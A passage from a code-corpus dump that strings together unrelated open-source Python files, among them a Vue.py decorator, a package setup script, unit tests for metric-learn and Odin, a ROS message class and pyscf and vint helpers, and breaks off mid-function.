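# A minimal usage sketch (not part of the original module), assuming both ends are driven
# from the same asyncio loop purely for illustration; in a real deployment the client runs
# in another process and receives the rendezvous paths out of band. Note the path swap:
# the client reads from the channel's out_path and writes to its in_path.
#
# async def _demo() -> None:
#     channel = make_ipc_channel()
#     client = make_ipc_channel_client(channel.out_path, channel.in_path)
#     accepted, connected = await asyncio.gather(channel.connect(), client.connect())
#     assert accepted and connected
#     await client.write(b"ping")
#     assert await channel.read() == b"ping"
#     await client.close()
#     await channel.close()
#
# asyncio.get_event_loop().run_until_complete(_demo())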
|
vue/decorators/base.py | adamlwgriffiths/vue.py | 274 | 17351 | from vue.bridge import Object
import javascript
class VueDecorator:
__key__ = None
__parents__ = ()
__id__ = None
__value__ = None
def update(self, vue_dict):
base = vue_dict
for parent in self.__parents__:
base = vue_dict.setdefault(parent, {})
if self.__id__ is None:
base[self.__key__] = self.__value__
else:
base = base.setdefault(self.__key__, {})
value = self.__value__
if isinstance(base.get(self.__id__), dict):
base[self.__id__].update(value)
else:
base[self.__id__] = value
def pyjs_bridge(fn, inject_vue_instance=False):
def wrapper(*args, **kwargs):
args = (javascript.this(), *args) if inject_vue_instance else args
args = tuple(Object.from_js(arg) for arg in args)
kwargs = {k: Object.from_js(v) for k, v in kwargs.items()}
return Object.to_js(fn(*args, **kwargs))
wrapper.__name__ = fn.__name__
return wrapper
|
setup.py | tgolsson/appJar | 666 | 17355 | from setuptools import setup, find_packages
__name__ = "appJar"
__version__ = "0.94.0"
__author__ = "<NAME>"
__desc__ = "An easy-to-use, feature-rich GUI wrapper for tKinter. Designed specifically for use in the classroom, but powerful enough to be used anywhere."
__author_email__ = "<EMAIL>"
__license__ = "Apache 2.0"
__url__ = "http://appJar.info"
__keywords__ = ["python", "gui", "tkinter", "appJar", "interface"]
__packages__= ["appJar"]
__classifiers__ = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Education',
'Topic :: Software Development',
'Topic :: Software Development :: User Interfaces',
'Topic :: Software Development :: Libraries :: Python Modules',
'License :: OSI Approved :: Apache Software License',
]
__long_description__ = """# appJar
Simple tKinter GUIs in Python.
"""
setup(
name=__name__,
packages=__packages__,
version=__version__,
description=__desc__,
long_description=__long_description__,
long_description_content_type="text/markdown",
author=__author__,
author_email=__author_email__,
url=__url__,
keywords=__keywords__,
license=__license__,
classifiers=__classifiers__,
package_data = {
"appJar": ["lib/*.py", "lib/*.txt", "lib/tkdnd2.8/*.tcl", "lib/tkdnd2.8/tcl_files/*.tcl", "lib/tkdnd2.8/tcl_libs/*", "resources/icons/*", "examples/showcase.py", "PYPI.md"]
}
)
|
office-plugin/windows-office/program/wizards/ui/event/RadioDataAware.py | jerrykcode/kkFileView | 6,660 | 17382 | #
# This file is part of the LibreOffice project.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
#
# This file incorporates work covered by the following license notice:
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed
# with this work for additional information regarding copyright
# ownership. The ASF licenses this file to you under the Apache
# License, Version 2.0 (the "License"); you may not use this file
# except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0 .
#
from .CommonListener import ItemListenerProcAdapter
from .DataAware import DataAware
class RadioDataAware(DataAware):
def __init__(self, data, value, radioButtons):
super(RadioDataAware,self).__init__(data, value)
self.radioButtons = radioButtons
def setToUI(self, value):
selected = int(value)
if selected == -1:
for i in self.radioButtons:
i.State = False
else:
self.radioButtons[selected].State = True
def getFromUI(self):
for index, workwith in enumerate(self.radioButtons):
if workwith.State:
return index
return -1
@classmethod
def attachRadioButtons(self, data, prop, buttons, field):
da = RadioDataAware(data, prop, buttons)
method = getattr(da,"updateData")
for i in da.radioButtons:
i.addItemListener(ItemListenerProcAdapter(method))
return da
|
odin-libraries/python/odin_test.py | gspu/odin | 447 | 17394 | """ Runs tests for Python Odin SDK """
import unittest
from os import environ
import random
from pymongo import MongoClient
import pyodin as odin
class OdinSdkTest(unittest.TestCase):
""" Establish OdinSdkTest object """
def setUp(self):
client = MongoClient(environ.get('ODIN_MONGODB'))
mongodb = client['odin']
self.collection = mongodb['observability']
def tearDown(self):
self.collection.delete_many({"id" : "test_id"})
def test_condition_not_odin_env(self):
""" Run condition operation outside of Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
odin_test = odin.Odin(config="job.yml", path_type="relative")
cond = odin_test.condition(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(cond, True)
self.assertEqual(None, result)
def test_watch_not_odin_env(self):
""" Run watch operation outside of Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
odin_test = odin.Odin(config="job.yml", path_type="relative")
odin_test.watch(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(None, result)
def test_condition(self):
""" Run condition operation inside Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
# test True sets odin exc env to true and in turn enables logging everything to the DB
odin_test = odin.Odin(test=True, config="job.yml", path_type="relative")
cond = odin_test.condition(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(cond, True)
self.assertEqual(test_desc, result['description'])
def test_watch(self):
""" Run watch operation inside Odin Env """
random_int = random.randint(100000, 999999)
test_desc = 'test_desc' + str(random_int)
# test True sets odin exc env to true and in turn enables logging everything to the DB
odin_test = odin.Odin(test=True, config="job.yml", path_type="relative")
odin_test.watch(test_desc, True)
result = self.collection.find_one({"description" : test_desc})
self.assertEqual(test_desc, result['description'])
if __name__ == "__main__":
unittest.main() # run all tests
|
artemis/general/test_dict_ops.py | peteroconnor-bc/artemis | 235 | 17395 | from artemis.general.dict_ops import cross_dict_dicts, merge_dicts
__author__ = 'peter'
def test_cross_dict_dicts():
assert cross_dict_dicts({'a':{'aa': 1}, 'b':{'bb': 2}}, {'c': {'cc': 3}, 'd': {'dd': 4}}) == {
('a','c'):{'aa':1, 'cc':3},
('a','d'):{'aa':1, 'dd':4},
('b','c'):{'bb':2, 'cc':3},
('b','d'):{'bb':2, 'dd':4}
}
def test_dict_merge():
assert merge_dicts({'a': 1, 'b': 2, 'c': 3}, {'c': 4, 'd': 5}, {'d': 6, 'e': 7}) == {
'a': 1,
'b': 2,
'c': 4,
'd': 6,
'e': 7,
}
if __name__ == "__main__":
test_dict_merge()
test_cross_dict_dicts()
|
scripts/redact_cli_py/redact/io/blob_reader.py | jhapran/OCR-Form-Tools | 412 | 17426 |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project
# root for license information.
from typing import List
from pathlib import Path
from azure.storage.blob import ContainerClient
from redact.types.file_bundle import FileBundle
class BlobReader():
def __init__(self, container_url: str, prefix: str):
self.container_client = ContainerClient.from_container_url(
container_url)
self.prefix = prefix
def download_bundles(self, to: str) -> List[FileBundle]:
blobs = self.container_client.list_blobs(name_starts_with=self.prefix)
all_file_name_list = [Path(blob.name).name for blob in blobs]
file_bundles = FileBundle.from_names(all_file_name_list)
for bundle in file_bundles:
image_blob_path = self.prefix + bundle.image_file_name
fott_blob_path = self.prefix + bundle.fott_file_name
ocr_blob_path = self.prefix + bundle.ocr_file_name
image_path = Path(to, bundle.image_file_name)
fott_path = Path(to, bundle.fott_file_name)
ocr_path = Path(to, bundle.ocr_file_name)
with open(image_path, 'wb') as image_file, \
open(fott_path, 'wb') as fott_file, \
open(ocr_path, 'wb') as ocr_file:
image_file.write(
self.container_client.
download_blob(image_blob_path).readall())
fott_file.write(
self.container_client.
download_blob(fott_blob_path).readall())
ocr_file.write(
self.container_client.
download_blob(ocr_blob_path).readall())
return file_bundles
|
Modules/ego_planner/ego-planner-swarm/src/uav_simulator/Utils/multi_map_server/src/multi_map_server/msg/_VerticalOccupancyGridList.py | 473867143/Prometheus | 1,217 | 17429 | """autogenerated by genpy from multi_map_server/VerticalOccupancyGridList.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class VerticalOccupancyGridList(genpy.Message):
_md5sum = "7ef85cc95b82747f51eb01a16bd7c795"
_type = "multi_map_server/VerticalOccupancyGridList"
_has_header = False #flag to mark the presence of a Header object
_full_text = """float32 x
float32 y
int32[] upper
int32[] lower
int32[] mass
"""
__slots__ = ['x','y','upper','lower','mass']
_slot_types = ['float32','float32','int32[]','int32[]','int32[]']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
    set to None will be assigned a default value. The recommended
    use is keyword arguments, as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
x,y,upper,lower,mass
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(VerticalOccupancyGridList, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.x is None:
self.x = 0.
if self.y is None:
self.y = 0.
if self.upper is None:
self.upper = []
if self.lower is None:
self.lower = []
if self.mass is None:
self.mass = []
else:
self.x = 0.
self.y = 0.
self.upper = []
self.lower = []
self.mass = []
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_2f.pack(_x.x, _x.y))
length = len(self.upper)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.upper))
length = len(self.lower)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.lower))
length = len(self.mass)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *self.mass))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
end = 0
_x = self
start = end
end += 8
(_x.x, _x.y,) = _struct_2f.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.upper = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.lower = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mass = struct.unpack(pattern, str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_2f.pack(_x.x, _x.y))
length = len(self.upper)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.upper.tostring())
length = len(self.lower)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.lower.tostring())
length = len(self.mass)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(self.mass.tostring())
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(_x))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(_x))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
end = 0
_x = self
start = end
end += 8
(_x.x, _x.y,) = _struct_2f.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.upper = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.lower = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mass = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_2f = struct.Struct("<2f")
|
docs/examples/timer.py | vlcinsky/nameko | 3,425 | 17441 |
from nameko.timer import timer
class Service:
name ="service"
@timer(interval=1)
def ping(self):
# method executed every second
print("pong")
|
app/controllers/config/system/slack.py | grepleria/SnitchDNS | 152 | 17442 |
from .. import bp
from flask import request, render_template, flash, redirect, url_for
from flask_login import current_user, login_required
from app.lib.base.provider import Provider
from app.lib.base.decorators import admin_required
@bp.route('/slack', methods=['GET'])
@login_required
@admin_required
def slack():
return render_template('config/system/slack.html')
@bp.route('/slack/save', methods=['POST'])
@login_required
@admin_required
def slack_save():
provider = Provider()
settings = provider.settings()
slack_enabled = True if int(request.form.get('slack_enabled', 0)) == 1 else False
settings.save('slack_enabled', slack_enabled)
flash('Settings saved', 'success')
return redirect(url_for('config.slack'))
|
test/test_base_metric.py | Spraitazz/metric-learn | 547 | 17460 | import pytest
import re
import unittest
import metric_learn
import numpy as np
from sklearn import clone
from test.test_utils import ids_metric_learners, metric_learners, remove_y
from metric_learn.sklearn_shims import set_random_state, SKLEARN_AT_LEAST_0_22
def remove_spaces(s):
return re.sub(r'\s+', '', s)
def sk_repr_kwargs(def_kwargs, nndef_kwargs):
"""Given the non-default arguments, and the default
keywords arguments, build the string that will appear
in the __repr__ of the estimator, depending on the
version of scikit-learn.
"""
if SKLEARN_AT_LEAST_0_22:
def_kwargs = {}
def_kwargs.update(nndef_kwargs)
args_str = ",".join(f"{key}={repr(value)}"
for key, value in def_kwargs.items())
return args_str
class TestStringRepr(unittest.TestCase):
def test_covariance(self):
def_kwargs = {'preprocessor': None}
nndef_kwargs = {}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.Covariance())),
remove_spaces(f"Covariance({merged_kwargs})"))
def test_lmnn(self):
def_kwargs = {'convergence_tol': 0.001, 'init': 'auto', 'k': 3,
'learn_rate': 1e-07, 'max_iter': 1000, 'min_iter': 50,
'n_components': None, 'preprocessor': None,
'random_state': None, 'regularization': 0.5,
'verbose': False}
nndef_kwargs = {'convergence_tol': 0.01, 'k': 6}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.LMNN(convergence_tol=0.01, k=6))),
remove_spaces(f"LMNN({merged_kwargs})"))
def test_nca(self):
def_kwargs = {'init': 'auto', 'max_iter': 100, 'n_components': None,
'preprocessor': None, 'random_state': None, 'tol': None,
'verbose': False}
nndef_kwargs = {'max_iter': 42}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.NCA(max_iter=42))),
remove_spaces(f"NCA({merged_kwargs})"))
def test_lfda(self):
def_kwargs = {'embedding_type': 'weighted', 'k': None,
'n_components': None, 'preprocessor': None}
nndef_kwargs = {'k': 2}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.LFDA(k=2))),
remove_spaces(f"LFDA({merged_kwargs})"))
def test_itml(self):
def_kwargs = {'convergence_threshold': 0.001, 'gamma': 1.0,
'max_iter': 1000, 'preprocessor': None,
'prior': 'identity', 'random_state': None, 'verbose': False}
nndef_kwargs = {'gamma': 0.5}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.ITML(gamma=0.5))),
remove_spaces(f"ITML({merged_kwargs})"))
def_kwargs = {'convergence_threshold': 0.001, 'gamma': 1.0,
'max_iter': 1000, 'num_constraints': None,
'preprocessor': None, 'prior': 'identity',
'random_state': None, 'verbose': False}
nndef_kwargs = {'num_constraints': 7}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.ITML_Supervised(num_constraints=7))),
remove_spaces(f"ITML_Supervised({merged_kwargs})"))
def test_lsml(self):
def_kwargs = {'max_iter': 1000, 'preprocessor': None, 'prior': 'identity',
'random_state': None, 'tol': 0.001, 'verbose': False}
nndef_kwargs = {'tol': 0.1}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.LSML(tol=0.1))),
remove_spaces(f"LSML({merged_kwargs})"))
def_kwargs = {'max_iter': 1000, 'num_constraints': None,
'preprocessor': None, 'prior': 'identity',
'random_state': None, 'tol': 0.001, 'verbose': False,
'weights': None}
nndef_kwargs = {'verbose': True}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.LSML_Supervised(verbose=True))),
remove_spaces(f"LSML_Supervised({merged_kwargs})"))
def test_sdml(self):
def_kwargs = {'balance_param': 0.5, 'preprocessor': None,
'prior': 'identity', 'random_state': None,
'sparsity_param': 0.01, 'verbose': False}
nndef_kwargs = {'verbose': True}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.SDML(verbose=True))),
remove_spaces(f"SDML({merged_kwargs})"))
def_kwargs = {'balance_param': 0.5, 'num_constraints': None,
'preprocessor': None, 'prior': 'identity',
'random_state': None, 'sparsity_param': 0.01,
'verbose': False}
nndef_kwargs = {'sparsity_param': 0.5}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.SDML_Supervised(sparsity_param=0.5))),
remove_spaces(f"SDML_Supervised({merged_kwargs})"))
def test_rca(self):
def_kwargs = {'n_components': None, 'preprocessor': None}
nndef_kwargs = {'n_components': 3}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.RCA(n_components=3))),
remove_spaces(f"RCA({merged_kwargs})"))
def_kwargs = {'chunk_size': 2, 'n_components': None, 'num_chunks': 100,
'preprocessor': None, 'random_state': None}
nndef_kwargs = {'num_chunks': 5}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.RCA_Supervised(num_chunks=5))),
remove_spaces(f"RCA_Supervised({merged_kwargs})"))
def test_mlkr(self):
def_kwargs = {'init': 'auto', 'max_iter': 1000,
'n_components': None, 'preprocessor': None,
'random_state': None, 'tol': None, 'verbose': False}
nndef_kwargs = {'max_iter': 777}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.MLKR(max_iter=777))),
remove_spaces(f"MLKR({merged_kwargs})"))
def test_mmc(self):
def_kwargs = {'convergence_threshold': 0.001, 'diagonal': False,
'diagonal_c': 1.0, 'init': 'identity', 'max_iter': 100,
'max_proj': 10000, 'preprocessor': None,
'random_state': None, 'verbose': False}
nndef_kwargs = {'diagonal': True}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(remove_spaces(str(metric_learn.MMC(diagonal=True))),
remove_spaces(f"MMC({merged_kwargs})"))
def_kwargs = {'convergence_threshold': 1e-06, 'diagonal': False,
'diagonal_c': 1.0, 'init': 'identity', 'max_iter': 100,
'max_proj': 10000, 'num_constraints': None,
'preprocessor': None, 'random_state': None,
'verbose': False}
nndef_kwargs = {'max_iter': 1}
merged_kwargs = sk_repr_kwargs(def_kwargs, nndef_kwargs)
self.assertEqual(
remove_spaces(str(metric_learn.MMC_Supervised(max_iter=1))),
remove_spaces(f"MMC_Supervised({merged_kwargs})"))
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_get_metric_is_independent_from_metric_learner(estimator,
build_dataset):
"""Tests that the get_metric method returns a function that is independent
from the original metric learner"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
# we fit the metric learner on it and then we compute the metric on some
# points
model.fit(*remove_y(model, input_data, labels))
metric = model.get_metric()
score = metric(X[0], X[1])
# then we refit the estimator on another dataset
model.fit(*remove_y(model, np.sin(input_data), labels))
# we recompute the distance between the two points: it should be the same
score_bis = metric(X[0], X[1])
assert score_bis == score
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_get_metric_raises_error(estimator, build_dataset):
"""Tests that the metric returned by get_metric raises errors similar to
the distance functions in scipy.spatial.distance"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(*remove_y(model, input_data, labels))
metric = model.get_metric()
list_test_get_metric_raises = [(X[0].tolist() + [5.2], X[1]), # vectors with
# different dimensions
(X[0:4], X[1:5]), # 2D vectors
(X[0].tolist() + [5.2], X[1] + [7.2])]
# vectors of same dimension but incompatible with what the metric learner
# was trained on
for u, v in list_test_get_metric_raises:
with pytest.raises(ValueError):
metric(u, v)
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_get_metric_works_does_not_raise(estimator, build_dataset):
"""Tests that the metric returned by get_metric does not raise errors (or
warnings) similarly to the distance functions in scipy.spatial.distance"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
set_random_state(model)
model.fit(*remove_y(model, input_data, labels))
metric = model.get_metric()
list_test_get_metric_doesnt_raise = [(X[0], X[1]),
(X[0].tolist(), X[1].tolist()),
(X[0][None], X[1][None])]
for u, v in list_test_get_metric_doesnt_raise:
with pytest.warns(None) as record:
metric(u, v)
assert len(record) == 0
# Test that the scalar case works
model.components_ = np.array([3.1])
metric = model.get_metric()
for u, v in [(5, 6.7), ([5], [6.7]), ([[5]], [[6.7]])]:
with pytest.warns(None) as record:
metric(u, v)
assert len(record) == 0
@pytest.mark.parametrize('estimator, build_dataset', metric_learners,
ids=ids_metric_learners)
def test_n_components(estimator, build_dataset):
"""Check that estimators that have a n_components parameters can use it
and that it actually works as expected"""
input_data, labels, _, X = build_dataset()
model = clone(estimator)
if hasattr(model, 'n_components'):
set_random_state(model)
model.set_params(n_components=None)
model.fit(*remove_y(model, input_data, labels))
assert model.components_.shape == (X.shape[1], X.shape[1])
model = clone(estimator)
set_random_state(model)
model.set_params(n_components=X.shape[1] - 1)
model.fit(*remove_y(model, input_data, labels))
assert model.components_.shape == (X.shape[1] - 1, X.shape[1])
model = clone(estimator)
set_random_state(model)
model.set_params(n_components=X.shape[1] + 1)
with pytest.raises(ValueError) as expected_err:
model.fit(*remove_y(model, input_data, labels))
assert (str(expected_err.value) ==
'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))
model = clone(estimator)
set_random_state(model)
model.set_params(n_components=0)
with pytest.raises(ValueError) as expected_err:
model.fit(*remove_y(model, input_data, labels))
assert (str(expected_err.value) ==
'Invalid n_components, must be in [1, {}]'.format(X.shape[1]))
if __name__ == '__main__':
unittest.main()
|
examples/geomopt/20-callback.py | QuESt-Calculator/pyscf | 501 | 17461 | <reponame>QuESt-Calculator/pyscf
#!/usr/bin/env python
'''
Run a callback function at each geometry optimization step to perform extra analysis on the intermediate SCF results.
'''
from pyscf import gto, scf
from pyscf.geomopt import berny_solver
from pyscf.geomopt import geometric_solver
mol = gto.M(atom='''
C 0.000000 0.000000 -0.542500
O 0.000000 0.000000 0.677500
H 0.000000 0.9353074360871938 -1.082500
H 0.000000 -0.9353074360871938 -1.082500
''',
basis='3-21g')
mf = scf.RHF(mol)
# Run analyze function in callback
def cb(envs):
mf = envs['g_scanner'].base
mf.analyze(verbose=4)
#
# Method 1: Pass callback to optimize function
#
geometric_solver.optimize(mf, callback=cb)
berny_solver.optimize(mf, callback=cb)
#
# Method 2: Add callback to geometry optimizer
#
opt = mf.nuc_grad_method().as_scanner().optimizer()
opt.callback = cb
opt.kernel()
|
atlas/foundations_contrib/src/foundations_contrib/helpers/shell.py | DeepLearnI/atlas | 296 | 17485 | <gh_stars>100-1000
def find_bash():
import os
if os.name == 'nt':
return _find_windows_bash()
return '/bin/bash'
def _find_windows_bash():
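    # Git for Windows registers a "git_shell" context-menu command under
    # HKEY_CLASSES_ROOT; read that command, take its first token (the path to
    # git-bash.exe) and derive the matching bin\bash.exe path from it.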
winreg = _winreg_module()
import csv
StringIO = _get_string_io()
from os.path import dirname
sub_key = 'Directory\\shell\\git_shell\\command'
value = winreg.QueryValue(winreg.HKEY_CLASSES_ROOT, sub_key)
with StringIO(value) as file:
reader = csv.reader(file, delimiter=' ', quotechar='"')
git_bash_location = list(reader)[0][0]
git_bash_directory = git_bash_location.split('\\git-bash.exe')[0]
bash_location = git_bash_directory + '\\bin\\bash.exe'
return bash_location
def _get_string_io():
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
return StringIO
def _winreg_module():
import winreg
return winreg
|
test/unit/vint/ast/plugin/scope_plugin/stub_node.py | mosheavni/vint | 538 | 17511 | <reponame>mosheavni/vint
from vint.ast.node_type import NodeType
from vint.ast.plugin.scope_plugin.identifier_attribute import (
IDENTIFIER_ATTRIBUTE,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG,
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT,
)
def create_id(id_value, is_declarative=True, is_function=False, is_autoload=False,
is_declarative_parameter=False, is_on_str_expr_context=False):
return {
'type': NodeType.IDENTIFIER.value,
'value': id_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: is_declarative,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: is_function,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: is_autoload,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: is_declarative_parameter,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: is_on_str_expr_context,
},
}
def create_env(env_value):
return {
'type': NodeType.ENV.value,
'value': env_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: True,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_option(opt_value):
return {
'type': NodeType.OPTION.value,
'value': opt_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: True,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_reg(reg_value):
return {
'type': NodeType.REG.value,
'value': reg_value,
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: True,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: False,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_curlyname(is_declarative=True):
""" Create a node as a `my_{'var'}`
"""
return {
'type': NodeType.CURLYNAME.value,
'value': [
{
'type': NodeType.CURLYNAMEPART.value,
'value': 'my_',
},
{
'type': NodeType.CURLYNAMEEXPR.value,
'value': {
'type': NodeType.CURLYNAMEEXPR.value,
'value': 'var',
},
}
],
IDENTIFIER_ATTRIBUTE: {
IDENTIFIER_ATTRIBUTE_DECLARATION_FLAG: is_declarative,
IDENTIFIER_ATTRIBUTE_DYNAMIC_FLAG: True,
IDENTIFIER_ATTRIBUTE_MEMBER_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_FLAG: False,
IDENTIFIER_ATTRIBUTE_AUTOLOAD_FLAG: False,
IDENTIFIER_ATTRIBUTE_FUNCTION_ARGUMENT_FLAG: False,
IDENTIFIER_ATTRIBUTE_LAMBDA_STRING_CONTEXT: False,
},
}
def create_subscript_member(is_declarative=True):
return {
'type': NodeType.IDENTIFIER.value,
'value': 'member',
IDENTIFIER_ATTRIBUTE: {
